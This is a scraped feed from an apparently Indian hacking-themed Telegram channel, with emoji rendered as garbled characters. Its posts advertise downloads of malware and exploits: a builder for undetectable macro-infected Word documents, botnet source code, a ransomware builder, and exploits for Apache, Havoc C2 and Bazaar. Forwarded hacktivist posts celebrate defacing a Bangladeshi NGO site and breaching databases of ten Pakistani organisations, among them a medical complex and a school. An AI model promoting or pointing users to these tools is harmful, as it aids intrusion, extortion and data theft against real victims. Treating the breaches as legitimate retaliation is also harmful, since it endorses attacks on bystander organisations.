CrackCodes ๐Ÿ‡ฎ๐Ÿ‡ณ
15.9K subscribers
1.89K photos
387 videos
722 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
About Admin: prapattimynk.crackcodes.in


Be Secure~
เคœเคฏ เคถเฅเคฐเฅ€ เคฐเคพเคฎ
Download Telegram
โค3
๐Ÿ–ฅ https://system32.ink/necroword-embed-payload-using-undetect-macros/ ๐Ÿ–ฅ

๐Ÿ’ปNecroWord - Embed Payload Using Undetect Macros๐Ÿ”ฉ


โ„น๏ธNecroWord โ€” an easy way to embed a payload using undetect macros! ๐Ÿ˜€

๐Ÿค” What is it?

โžก๏ธโ€” In simple words - you can create an undetect infected .doc document ๐Ÿ“„

โœ๏ธHow to use ?

โžก๏ธโ€ข Generate payload gird (image file with generated code)

๐ŸŸฃโ€ข Set download link to your payload-grid

โžก๏ธโ€ข Generate your infected document!

๐Ÿ†˜Attention! โ€” This is not a CVE | We condemn the use of software for illegal purposes. All responsibility for use lies with you
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3โค1๐Ÿ‘1๐Ÿฅฐ1
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Social Media OSINT Tools Collection

https://github.com/osintambition/Social-Media-OSINT-Tools-Collection

As you people have showed so much love to the repo, we had updated it yesterday. Many new tools and categories has been added.

If we missed any tool that you believe should be mentioned. Tell us in comments and we will add it.

Join @osintambition for more amazing stuff like this.

#osint #socmint #socint #tools #osinttools #resources #osintcollection
๐Ÿ‘3
Forwarded from Team-Network-Nine ๐Ÿ‡ฎ๐Ÿ‡ณ
Association of Voluntary Actions for Society (AVAS) of Bangladeash has been hacked by TEAM-NETWORK-NINE
โ˜ข๏ธ Site https://www.avas.org.bd/ind_desk.php
โœ… Poc https://ownzyou.com/zone/241999

โ˜ข๏ธ Threat Actor : Solveig

Greetz to

#TEAM 4-Bit
#Team NWH SECURITY
#Demonsec
#Team D4RK PREDAT0RZ
#ส€แด€sสœแด›ส€ษชสแด€ แด„สส™แด‡ส€ า“แดส€แด„แด‡
#Team ucc
#Team BlackDragonsec
#indiancybermafia
#anonsec
#cryptojackers india
#Hacktivist of vanguard
#the_nh_india
#kingsman
COUNTER CYBER ATTACK
๐Ÿพ5๐Ÿ‘1
Forwarded from CYBER TRICKS ZONE ๐Ÿ‡ฎ๐Ÿ‡ณ๐Ÿšฉ (๐™‹๐™ง๐™ค๐™ฉ๐™ค๐™˜๐™ค๐™ก ๐™‰๐™ž๐™˜๐™ )
๐ŸŒŸSubdominator๐ŸŒŸ is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes.

๐Ÿ“ฅ https://github.com/sanjai-AK47/Subdominator
๐Ÿ‘6
๐Ÿ”ฅ1
Forwarded from ๐“๐‡๐„ ๐๐ˆ๐†๐‡๐“ ๐‡๐”๐๐“๐„๐‘๐’ โšก๏ธ [offline]
"โšก๏ธเคฏเคฆเฅ เคนเฅƒเคทเฅ€เค•เฅ‡เคถเคƒ เคคเคฆเฅ เคตเคพเคฆเคƒ เคคเคฆเฅ เคตเคพเคฆเคƒ เคชเคฐเคฎเคƒ เคถเคฟเคตเคƒ"


โ˜ข๏ธRESPONSE TO RECENT CYBERATTACKSโ˜ข๏ธ

๐ŸŽฎ10 PAKISTANI WEBSITES DATABASES  HAS BEEN  SUCCESSFULLY BREACHED๐ŸŽฎ

๐ŸŒLIST๐ŸŒ

1 State Earthquake Reconstruction & rehabilitation agency (SERRA) Pakistan

2 Foaimplants Pakistan

3 Galaxy Petroleum Pakistan

4 Jinnah Business Review Pakistan

5 Gondal Memon Association Pakistan

6 Khyber Pakhtunkhwa Human Capital Investment Project Pakistan

7 Kiran Group of Companies Pakistan

8 Horizon Oil Company Pakistan

9
Rashid Latif Medical Complex Pakistan

10 Native School System Pakistan Pakistan


๐ŸŽฎGREETZ๐ŸŽฎ
#team_aica #network_nine
#kingsman
#team404error #anonymous_india
#hacktivist_heaven

๐ŸŽฎCOUNTER CYBER ATTACK๐ŸŽฎ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘5๐Ÿ”ฅ2โคโ€๐Ÿ”ฅ1๐Ÿพ1
๐Ÿ—ฟ27๐Ÿ‘5โค4๐Ÿซก2๐Ÿ‘Œ1
Mission_SBS.txt
1.1 KB
๐Ÿ‘3๐Ÿ’”2
https://system32.ink/cosanostra-v-1-2-http-botnet-source-code/

CosaNostra v.1.2 HTTP Botnet + Source Code
โšก2โค1๐Ÿ‘1
๐Ÿ’ฏ13๐Ÿ—ฟ6๐Ÿ’”3โคโ€๐Ÿ”ฅ2โšก1๐Ÿคฉ1๐Ÿพ1
Hey everyone! Are you interested in starting your journey in cloud and along the way earn some exciting Google Cloud goodies? Then enrol in the Google Cloud Arcade Facilitator program now! We have recently been on-boarded as an Arcade Facilitator team and would love to help you in your journey to cloud. If interested, then just go to the site below and enrol using the form. While filling out the form, enter our referral code - GCAF24-IN-JTJ-ASW so that we can help you during your journey. :) Link to the form - bit.ly/arcade-facilitator.


Join This Group For More Details: https://chat.whatsapp.com/HhFoFhemImVA7vFzgO56Gk
๐Ÿ‘3
This media is not supported in your browser
VIEW IN TELEGRAM
https://system32.ink/havoc-c2-ssrf-poc/

Havoc C2 0.7 Teamserver SSRF exploit
โค2
๐Ÿคฃ28โค4๐Ÿ‘1
๐Ÿ” ๐Ÿ” ๐Ÿ” ๐Ÿ” ๐Ÿ”ค๐Ÿ”ค๐Ÿšฉ๐Ÿšฉ: https://system32.ink/slam-ransomware-builder/

๐ŸŽฎSlam Ransomware Builder๐ŸŽฎ
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฃ13
*Rest is history
๐Ÿคฃ26โšก3๐Ÿ‘1
Forwarded from OSINT AMBITION (Dheeraj Yadav)
We have achieved 1k followers on LinkedIn.

Thanks to everyone who had followed us on LinkedIn, those who haven't followed yet, please follow now.

https://www.linkedin.com/company/osintambition/

#osint #socmint #infosec #cybersec
โค3
๐Ÿ˜ ๐Ÿ”ค๐Ÿ”ค๐Ÿ”ค๐Ÿ”ค๐Ÿ”ค๐Ÿ” ๐Ÿ” ๐Ÿ’ป: https://system32.ink/apache-cve-2024-40725-and-cve-2024-40898-exploit/

CVE-2024-40725 and CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61. These flaws pose significant risks to web servers worldwide, potentially leading to source code disclosure and server-side request forgery (SSRF) attacks.


โŒจ๏ธApache CVE-2024-40725 and CVE-2024-40898 Exploitโ˜บ๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
โคโ€๐Ÿ”ฅ3
๐Ÿ’ป ๐Ÿ˜TRYHACKME ๐Ÿ˜’ PREMIUM AVAILABLE ( PAID ) โšก๏ธ

โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–

๐Ÿ”ฃ๐Ÿค“ONE MONTH : 250 RUPEES๐Ÿค‘๐Ÿ’ฒ

๐Ÿ”ฃ6๏ธโƒฃ month : 899 RUPEES ๐Ÿค‘๐Ÿ’ฒ

โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–

๐Ÿ” ๐Ÿ”  @protocolnick โœˆ๏ธ IF YOU NEED

1๏ธโƒฃ0๏ธโƒฃ0๏ธโƒฃ๐Ÿ”ฃ TRUSTED
1๏ธโƒฃ0๏ธโƒฃ0๏ธโƒฃ๐Ÿ”ค MONEY BACK GUARANTEE
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ” ๐Ÿ” ๐Ÿ” ๐ŸŸฐ https://system32.ink/bazaar-v1-4-3-directory-traversal-cve-2024-40348-exploit/ ๐Ÿ–ฅ

๐Ÿ˜ฌBazaar v1.4.3 Directory Traversal CVE-2024-40348 Exploit๐Ÿ”ฅ


โญ๏ธAn issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal.๐Ÿ–ฅ
Please open Telegram to view this post
VIEW IN TELEGRAM